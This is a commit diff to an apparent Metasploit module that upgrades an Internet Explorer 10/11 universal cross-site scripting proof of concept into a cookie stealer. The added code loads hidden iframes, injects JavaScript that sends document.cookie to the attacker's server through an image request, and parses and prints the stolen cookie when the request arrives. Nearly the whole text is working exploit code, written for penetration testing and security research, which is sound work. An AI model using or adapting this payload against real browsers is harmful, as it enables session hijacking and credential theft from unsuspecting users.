Final

2015-02-05 04:36:44 -06:00 · 2015-02-05 04:36:44 -06:00 · 75c697c4dc
parent 1ccfb6cb43
commit 75c697c4dc
1 changed files with 73 additions and 10 deletions
--- a/modules/auxiliary/gather/ie_uxss.rb
+++ b/modules/auxiliary/gather/ie_uxss.rb
@ -11,14 +11,23 @@ class Metasploit3 < Msf::Auxiliary

  def initialize(info={})
    super(update_info(info,
-      'Name'           => "Microsoft Internet Explorer Cross-domain JavaScript Injection",
+      'Name'           => "Microsoft Internet Explorer 10 and 11 Cross-domain Cookie Stealing",
      'Description'    => %q{
-        This is an example of building a browser exploit using the BrowserExploitServer mixin
+          This module exploits a universal cross-site scripting vulnerability found in Internet
+          Explorer 10 and 11. It will steal the cookie of a specific webiste (set by the TARGET_URI
+          datastore option). You will also most likely need to configure the SERVER_PUBLIC_IP
+          datastore option in order receive the cookie. If you and the victim are actually in the
+          same network, then you don't need to touch SERVER_PUBLIC_IP.
      },
      'License'        => MSF_LICENSE,
-      'Author'         => [ 'sinn3r' ],
+      'Author'         =>
+        [
+          'David Leo', # Original discovery
+          'sinn3r'     # MSF
+        ],
      'References'     =>
        [
+          [ 'URL', 'http://www.deusen.co.uk/items/insider3show.3362009741042107/'],
          [ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2015/Feb/10' ]
        ],
@ -29,7 +38,7 @@ class Metasploit3 < Msf::Auxiliary
    register_options(
    [
      OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
-      #OptString.new('CUSTOM_JS', [ false, 'Custom JavaScript to inject (default: cookie stealing)' ])
+      OptString.new('SERVER_PUBLIC_IP', [ false, 'The exploit\'s public facing IP (Default: Internal IP)']),
    ], self.class)
  end

@ -49,12 +58,55 @@ class Metasploit3 < Msf::Auxiliary
    @html ||= html
  end

+  def ninja_cookie_stealer_name
+    @ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
+  end
+
+  def get_uri(cli=self.cli)
+    ssl = !!(datastore["SSL"])
+    proto = (ssl ? "https://" : "http://")
+    if datastore['URIHOST']
+      host = datastore['URIHOST']
+    elsif datastore['SERVER_PUBLIC_IP']
+      host = datastore['SERVER_PUBLIC_IP']
+    elsif (cli and cli.peerhost)
+      host = Rex::Socket.source_address(cli.peerhost)
+    else
+      host = srvhost_addr
+    end
+
+    if Rex::Socket.is_ipv6?(host)
+      host = "[#{host}]"
+    end
+
+    if datastore['URIPORT'] != 0
+      port = ':' + datastore['URIPORT'].to_s
+    elsif (ssl and datastore["SRVPORT"] == 443)
+      port = ''
+    elsif (!ssl and datastore["SRVPORT"] == 80)
+      port = ''
+    else
+      port = ":" + datastore["SRVPORT"].to_s
+    end
+
+    uri = proto + host + port + get_resource
+
+    uri
+  end
+
+  def server_uri
+    @server_uri ||= get_uri
+  end
+
  def html
+
    %Q|
-<iframe src="#{get_resource}/redirect.php"></iframe>
-<iframe src="#{datastore['TARGET_URI']}"></iframe>
+<iframe style="display:none" src="#{get_resource}/redirect.php"></iframe>
+<iframe style="display:none" src="#{datastore['TARGET_URI']}"></iframe>
 <script>
-    top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:alert(document.domain)"');
+    w = window.frames[0];
+    var payload = "var e = document.createElement('img'); e.src='#{server_uri}/#{ninja_cookie_stealer_name}?data=' + encodeURIComponent(document.cookie);"
+    top[0].eval('_=top[1];with(new XMLHttpRequest)open("get","#{get_resource}/sleep.php",false),send();_.location="javascript:%22%3Cscript%3E'+ encodeURIComponent(payload) +'%3C%2Fscript%3E%22"');
 </script>
    |
  end
@ -63,15 +115,26 @@ class Metasploit3 < Msf::Auxiliary
    exploit
  end

+  def extract_cookie(uri)
+    Rex::Text.uri_decode(uri.to_s.scan(/#{ninja_cookie_stealer_name}\?data=(.+)/).flatten[0].to_s)
+  end
+
  def on_request_uri(cli, request)
-    print_status(request.uri)
    case request.uri
    when /redirect\.php/
      print_status("sending redirect")
      send_redirect(cli, "#{datastore['TARGET_URI']}")
-    when /sleep.php/
-      sleep(1)
+    when /sleep\.php/
+      sleep(3)
      send_response(cli, '')
+    when /#{ninja_cookie_stealer_name}/
+      data = extract_cookie(request.uri)
+      if data.blank?
+        print_status("The XSS worked, but no cookie")
+      else
+        print_status("Got cookie")
+        print_line(data)
+      end
    else
      print_status("sending html")
      send_response(cli, get_html)